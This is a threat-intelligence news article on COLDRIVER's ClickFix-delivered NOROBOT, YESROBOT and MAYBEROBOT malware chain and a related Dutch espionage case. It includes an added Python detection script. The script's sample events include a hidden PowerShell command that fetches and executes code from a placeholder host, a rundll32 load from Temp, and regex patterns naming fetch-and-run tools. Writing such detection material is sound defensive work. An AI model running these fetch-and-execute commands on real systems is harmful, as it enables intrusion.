
The new malware, attributed to a Russia-linked hacker group known as COLDRIVER, has gone through multiple iterations since May 2025, suggesting an increase in the “tempo of operations” by the threat actors.
The findings come from the Google Threat Intelligence Group (GTIG), which states that in the same period, just five days after details of the LOSTKEYS malware were made public, the state-sponsored hacking group rapidly refined and rebuilt its malware arsenal.
It is currently unclear how long the new malware family has been in development, but the tech giant’s threat intelligence team said it has not observed a single instance of LOSTKEYS since its publication.
The new malware, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, is “a collection of related malware families connected through a distribution chain,” GTIG researcher Wesley Shields said in an analysis Monday.

The latest wave of attacks differs somewhat from COLDRIVER’s typical tactics, which target NGOs, policy advisors, and prominent opposition figures to steal their credentials. The new activity instead uses ClickFix-style lures that trick users into running malicious PowerShell commands through the Windows Run dialog as part of a fake CAPTCHA verification prompt.
Attacks observed in January, March, and April 2025 led to the introduction of information-stealing malware known as LOSTKEYS, while subsequent intrusions paved the way for the “ROBOT” family of malware. It is worth noting that the malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.
The new infection chain begins with an HTML ClickFix lure called COLDCOPY that is designed to drop a DLL called NOROBOT, which is executed via rundll32.exe and drops the next stage of malware. An earlier version of this attack reportedly distributed a Python backdoor known as YESROBOT before the threat actors switched to a PowerShell implant named MAYBEROBOT.
YESROBOT uses HTTPS to obtain commands from a hard-coded command-and-control (C2) server. It is a minimal backdoor that supports downloading and executing files in order to retrieve documents of interest. To date, only two deployments of YESROBOT have been observed, both during a two-week period in late May, shortly after details of LOSTKEYS were made public.

In contrast, MAYBEROBOT is considered more flexible and extensible, with the ability to download and execute payloads from specified URLs, execute commands using cmd.exe, and execute PowerShell code.
COLDRIVER’s operators are believed to have hastily deployed YESROBOT as a “stopgap mechanism” after the public disclosure, before abandoning it in favor of MAYBEROBOT. This is because the initial version of NOROBOT also included a step to download a complete Python 3.8 installation onto the compromised host, a “noisy” artifact that is likely to arouse suspicion.
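The chain described above (Run-dialog PowerShell, a DLL launched through rundll32.exe, and the noisy Python 3.8 installer download) maps onto three process-creation checks a defender can run over endpoint telemetry. The following Python is an added example, not code from GTIG or the report; the events, PIDs, file paths and the example.invalid host are constructed for the demonstration.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1-style fields) for this example.
# Paths, PIDs and hostnames are made up; example.invalid is a placeholder, not a real C2.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Run-dialog launch: explorer.exe is the parent of a hidden PowerShell that fetches and runs code
    {"pid": 100, "ppid": 10, "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -nop -c "iwr https://example.invalid/verify | iex"'},
    # Next stage: a DLL in a user-writable path run through rundll32, spawned by that PowerShell
    {"pid": 101, "ppid": 100, "parent": PS, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\stage.dll,Start"},
    # The "noisy" artifact: pulling down a full Python 3.8 installer
    {"pid": 102, "ppid": 100, "parent": PS, "image": PS,
     "cmdline": r'powershell -c "iwr https://example.invalid/python-3.8.10-amd64.exe -OutFile $env:TEMP\py.exe"'},
    # Benign noise: admin PowerShell from cmd.exe, and rundll32 loading a System32 DLL
    {"pid": 200, "ppid": 20, "parent": r"C:\Windows\System32\cmd.exe", "image": PS,
     "cmdline": "powershell Get-Process"},
    {"pid": 201, "ppid": 30, "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.I)
FETCH_AND_RUN = re.compile(
    r"(?<![\w-])(iwr|invoke-webrequest|downloadstring|iex|invoke-expression|-enc\w*)\b", re.I)
PY38_INSTALLER = re.compile(r"python-3\.8[\d.]*[^\s\"']*\.exe", re.I)


def _is(image, name):
    """True when the image path ends with the given executable name."""
    return image.lower().endswith("\\" + name)


def detect_clickfix_chain(events):
    """Return (rule, pid) alerts for the three observable stages of the chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        cmd = e["cmdline"]
        # Stage 1: PowerShell launched from the Run dialog (parent explorer.exe) that fetches and executes code
        if _is(e["image"], "powershell.exe") and _is(e["parent"], "explorer.exe") and FETCH_AND_RUN.search(cmd):
            alerts.append(("ps_from_run_dialog_fetch_exec", e["pid"]))
        # Stage 2: rundll32 loading a DLL from a user-writable directory, with PowerShell as its parent
        parent = by_pid.get(e["ppid"])
        if (_is(e["image"], "rundll32.exe") and USER_WRITABLE.search(cmd)
                and parent is not None and _is(parent["image"], "powershell.exe")):
            alerts.append(("rundll32_user_dll_from_powershell", e["pid"]))
        # Stage 3: PowerShell downloading a Python 3.8 installer (the noisy artifact)
        if _is(e["image"], "powershell.exe") and PY38_INSTALLER.search(cmd):
            alerts.append(("python38_installer_download", e["pid"]))
    return alerts
```

Running `detect_clickfix_chain(SAMPLE_EVENTS)` flags PIDs 100, 101 and 102 and ignores the two benign events; in practice the same parent/child correlation is done on real Sysmon or EDR process-creation records.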
Google also noted that the use of NOROBOT and MAYBEROBOT is likely to be limited to high-value targets that may have already been compromised by phishing, with the ultimate goal of gathering additional information from the device.
“NOROBOT and its predecessor infection chains have been constantly evolving, first being simplified to increase the likelihood of successful deployment and then reintroducing complexity by splitting the cryptographic keys,” Shields said. “This continued development highlights the group’s efforts to evade detection systems and delivery mechanisms for continuous intelligence collection against high-value targets.”

The revelations came after the Dutch public prosecutor’s office, the Openbaar Ministerie (OM), announced that three 17-year-old men are suspected of providing services to foreign governments, and that one of them is suspected of being in contact with a hacker group affiliated with the Russian government.
“The suspect also instructed two other people to map Wi-Fi networks on multiple dates in The Hague,” the OM said. “The information collected may be shared by former suspects with clients for a fee and used for digital espionage or cyberattacks.”
Two of the suspects were arrested on September 22, 2025, while the third was also interviewed by authorities and is currently under house arrest due to his “limited role” in the case.
The Dutch government agency added: “There is no evidence yet that any pressure was applied to the suspects who were in contact with Russian state hacker groups.”
